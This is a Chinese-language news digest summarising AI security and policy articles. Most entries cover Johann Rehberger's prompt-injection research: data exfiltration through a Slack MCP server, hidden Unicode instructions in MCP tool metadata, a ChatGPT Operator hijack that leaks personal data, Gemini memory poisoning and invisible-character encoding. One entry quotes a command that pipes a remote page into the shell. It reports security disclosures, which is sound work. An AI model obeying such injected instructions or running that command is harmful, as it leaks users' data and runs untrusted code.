Embrace The Red 宣布 Month of AI Bugs 2025:8月连发20多篇智能体漏洞文章
安全研究员 Johann Rehberger 宣布发起 Month of AI Bugs 2025,8月将在博客发布超过20篇文章,披露 ChatGPT Codex、Claude Code、GitHub Copilot Agent Mode、Cursor、Windsurf、Devin 等主流编码智能体的安全漏洞。
安全研究员 Johann Rehberger 宣布发起 Month of AI Bugs 2025,8月将在博客发布超过20篇文章,披露 ChatGPT Codex、Claude Code、GitHub Copilot Agent Mode、Cursor、Windsurf、Devin 等主流编码智能体的安全漏洞。
Sayash Kapoor 在 AI as Normal Technology 系列长文中提出,尽管论文数量在 1900 至 2015 年间增长 500 倍,实际科学进步却在持平或放缓,这一生产进步悖论意味着 AI 可能进一步扩大差距。
安全研究员 Johann Rehberger 披露 Anthropic 已弃用且停止维护的 Slack MCP Server 存在数据外泄漏洞:服务器发消息时不禁用链接 unfurling,攻击者可借助提示词注入让 AI Agent 在消息中夹带机密链接,经 Slack 抓取预览时把数据泄露给第三方服务器。
安全研究者 Johann Rehberger 构建了 mcp-com-server,一个可同时托管多个 COM 对象的 MCP server,通过 CreateObject、Get/Set Property、InvokeMethod、QueryInterface 等工具实现 Windows 与 Office 自动化。
Johann Rehberger 发布 AI ClickFix 攻击概念验证,将现实中的 ClickFix 社会工程 TTP 改造后针对 Computer-Use Agent,诱导 claude-3-7-sonnet-20250219 在终端执行 curl -s https://wuzzi.net/computer/oops.html | sh。
安全研究者 Johann Rehberger 实测 ChatGPT o3 的新 chat history 记忆功能,发现它并非全文检索过往对话,而是在系统提示中维护 Assistant Response Preferences。
安全研究员 Johann Rehberger 发文解析 MCP 的安全风险并展示一条新的漏洞利用链。文章指出仅将恶意工具服务器加入会话即可劫持对话,工具元数据中的隐藏 Unicode Tag 指令可穿透 API 和 UI 层,用户在界面检查时不可见,Claude 会执行这些隐藏指令。
Arvind Narayanan 发表超过 1.5 万字的新论文《AI as Normal Technology》,提出应把 AI 视为可被人控制的普通技术,而非超人智能实体,并将扩展为下一本书,HTML 和 PDF 版本发布在 Knight First Amendment Institute 网站。
Johann Rehberger 分析 GitHub Copilot 通过 .github/copilot-instructions.md 读取仓库自定义指令带来的提示注入风险。
安全研究者 Johann Rehberger 在 ASCII Smuggler 中新增 Sneaky Bits 编码,用两个隐形 Unicode 字符(U+2062 表示 0、U+2064 表示 1)按位编码任意 Unicode 字符或字节序列。
安全研究者 Johann Rehberger 实测演示 ChatGPT Operator 可被网页中的提示词注入劫持,将 news.ycombinator.com、booking.com 等已登录站点上的私密邮箱、地址和电话输入第三方数据泄露页面。
安全研究人员 Johann Rehberger 演示,通过在文档中嵌入提示注入并配合延迟工具调用,可诱导 Gemini Advanced 把虚假信息写入用户长期记忆。
Sayash Kapoor 分析 WIRED AI Elections Project 收录的 78 起 2024 全球选举 AI 使用案例,发现其中 39 起无欺骗意图,且欺骗性内容不用 AI 也能以几百美元内成本复制。
Lilian Weng 发表长文《Reward Hacking in Reinforcement Learning》,系统讲解 RL 智能体利用奖励函数缺陷获取高奖励却不完成预期任务的现象。
Narayanan 等人撰文分析英国 NHS 肝移植匹配算法对年轻患者的系统性偏差。算法以预测患者有/无移植后 5 年存活率之差计算 TBS 评分,5 年上限低估了年轻患者终身获益,45 岁以下患者无论病情多重都难以获得优先排序,2024 年《柳叶刀》研究确认了这一偏差,患者群体早在 2015 年就通过官方渠道提出过警告。
Lilian Weng 在 Lil'Log 发布长文,系统梳理针对大语言模型的对抗攻击,假定攻击只发生在推理时、模型权重固定,并区分白盒与黑盒两类威胁模型。
大型预训练语言模型从互联网数据中不可避免地习得有害行为和偏见,安全部署需对生成过程施加强控制。Lilian Weng 在文中梳理了有害内容的定义分歧、Zampieri 等人提出的三级攻击性语言分类体系(OLID 数据集),以及专家标注、众包、专业审核员和合成数据四类毒性检测数据收集方式。